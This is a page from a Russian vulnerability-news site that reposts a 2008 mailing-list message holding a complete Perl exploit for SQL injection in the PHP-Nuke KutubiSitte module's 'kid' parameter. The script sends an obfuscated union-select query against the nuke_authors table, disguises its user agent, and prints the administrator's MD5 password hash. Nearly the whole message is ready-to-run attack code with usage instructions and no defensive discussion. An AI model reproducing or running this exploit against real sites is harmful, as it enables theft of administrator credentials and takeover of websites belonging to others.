Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  WoltLab Burning Board Lite 2 Beta 1 Thread Delete CSRF Vulnerability

  Alkacon OpenCms logfileViewSettings.
jsp XSS, file disclosure

  Horde Webmail file inclusion proof of concept & patch.

  WordPress Multiple Cross-Site Scripting Vulnerabilities

From:r080cy90r_(at)_gmail.com <r080cy90r_(at)_gmail.com>
Date:9 марта 2008 г.
Subject:PHP-Nuke KutubiSitte "kid" SQL Injection exploit code adding

#!/usr/bin/perl
use Getopt::Std;
use LWP::UserAgent;

sub usg{
printf("


  -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
  |  PHP-NUKE  KutubiSitte [kid]  =>  SQL Injection   |
  -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
 #######################################################
 # Bug by Lovebug Exploit-Code by r080cy90r from RBT-4 #
 #######################################################
<-<->-<->-<->-<->-<->-<->-<->-<-
>-<->-<->-<->-<->-<->-<->->
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
#:-------------------------------------------------------:#
:#|                    USAGE:                           |#:
:#| exploit.pl -h [Hostname] -p [Path] -U [User_Id]     |#:
#:-------------------------------------------------------:#
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
#:-------------------------------------------------------:#
:#|                   EXAMPLE:                          |#:
:#|  exploit.pl -h http://site.com -p /php-nuke/ -U 1   |#:
#:-------------------------------------------------------:#
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#


");
}
sub problem{
   print "\n\n[~] SITO NON VULNERABILE [~]\n\n";
   exit();
}
sub exploitation{
   
   $conn = LWP::UserAgent -> new;
   $conn->agent('Checkbot/0.4 ');
   $query_pwd =
$host.$path."modules.php?name=KutubiSitte&h_op=hadisgoster&kid=-
1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2
A%2A%2F0%2C0,aid,pwd,
4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%
2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D".
$user_id."%2F%2A";
   $return_pwd = $conn->get($query_pwd) || problem();
   $return_pwd->content() =~ /([0-9,a-f]{32})/ || problem();
   print "\n \[~\] Admin Password(md5)=$user_id is: $1 \[~\]\n\n ";
  }

getopts(":h:p:U:",\%args);
    $host = $args{h} if (defined $args{h});
    $path = $args{p} if (defined $args{p});
    $user_id= $args{U}if (defined $args{U});
    
    if (!defined $args{h} || !defined $args{p} || !defined $args{U}){
       usg();
    }
    else{
       exploitation();
    }

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород